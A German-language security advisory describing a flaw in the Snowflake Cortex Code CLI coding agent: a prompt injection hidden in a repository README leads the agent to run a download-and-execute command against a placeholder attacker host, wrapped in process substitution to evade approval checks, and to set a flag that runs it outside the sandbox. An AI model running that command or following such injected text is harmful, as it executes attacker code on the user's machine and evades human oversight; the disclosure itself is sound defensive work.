Snowflake Cortex Code CLI-Schwachstelle ermöglichte Sandbox-Escape und Malware-Ausführung

Sicherheitslücken-Details

Das Snowflake Cortex Code CLI ist ein Befehlszeilen-Codierungsagent, der ähnlich wie Claude Code und OpenAI's Codex arbeitet, mit integrierter Funktion zur Ausführung von SQL in Snowflake. Zwei Tage nach der Veröffentlichung wurde eine Sicherheitslücke im Befehlsvalidierungssystem von Cortex Code identifiziert, die speziell konstruierte bösartige Befehle ermöglichte, beliebige Befehle auszuführen, ohne die menschliche Genehmigungsschritte auszulösen, und diese Befehle außerhalb der Sandbox des Cortex CLI auszuführen.

Angriffskette

Der Angriff funktioniert über indirekte Prompt-Injection. Ein Benutzer öffnet Cortex und aktiviert die Sandbox, dann bittet er Cortex um Hilfe mit einem Drittanbieter-Open-Source-Codebasis. Eine in der README eines nicht vertrauenswürdigen Repositorys versteckte Prompt-Injection manipuliert Cortex zu der Annahme, dass es einen gefährlichen Befehl ausführen muss.

Cortex konnte Befehle innerhalb von Prozesssubstitutionsausdrücken nicht validieren, was die nicht genehmigte Ausführung des bösartigen Befehls ermöglichte:

cat < <(sh < <(wget -q0- https://ATTACKER_URL.com/bugbot))

Dieser Befehl lädt ein Skript vom Server eines Angreifers herunter und führt es aus. Die Umgehung funktionierte, weil:

• Unsichere Befehle innerhalb eines Prozesssubstitutions-<()-Ausdrucks nicht vom Validierungssystem ausgewertet wurden
• Der vollständige Befehl mit einem 'sicheren' Befehl begann (in diesem Fall cat)
• Befehle in Prozesssubstitutionsausdrücken niemals menschliche Genehmigung auslösten

Sandbox-Umgehung

Die Prompt-Injection manipuliert auch das Modell, um ein Flag zu setzen, das die Ausführung von Befehlen außerhalb der Sandbox auslöst. Cortex kann standardmäßig ein Flag setzen, um die Ausführung von Befehlen außerhalb der Sandbox auszulösen, und die Injection nutzt dies, um dem bösartigen Befehl zu ermöglichen, außerhalb der Sandbox ausgeführt zu werden.

Behebung

Das Snowflake-Sicherheitsteam validierte und behebt diese Sicherheitslücke und veröffentlichte einen Fix mit Cortex Code CLI Version 1.0.25 am 28. Februar 2026. Die vollständige Empfehlung von Snowflake ist innerhalb der Snowflake Community Site verfügbar unter: https://community.snowflake.com/s/article/PromptArmor-Report---Snowflake-Response

Hinweis: Diese Angriffskette galt auch für Nicht-Sandbox-Benutzer. Die Dokumentation zeigt, dass im OS+Regular-Modus alle Befehle eine Benutzerfreigabe anfordern. Befehle, die in der Sandbox ausgeführt werden, haben auch Netzwerk- und Dateizugriffsbeschränkungen.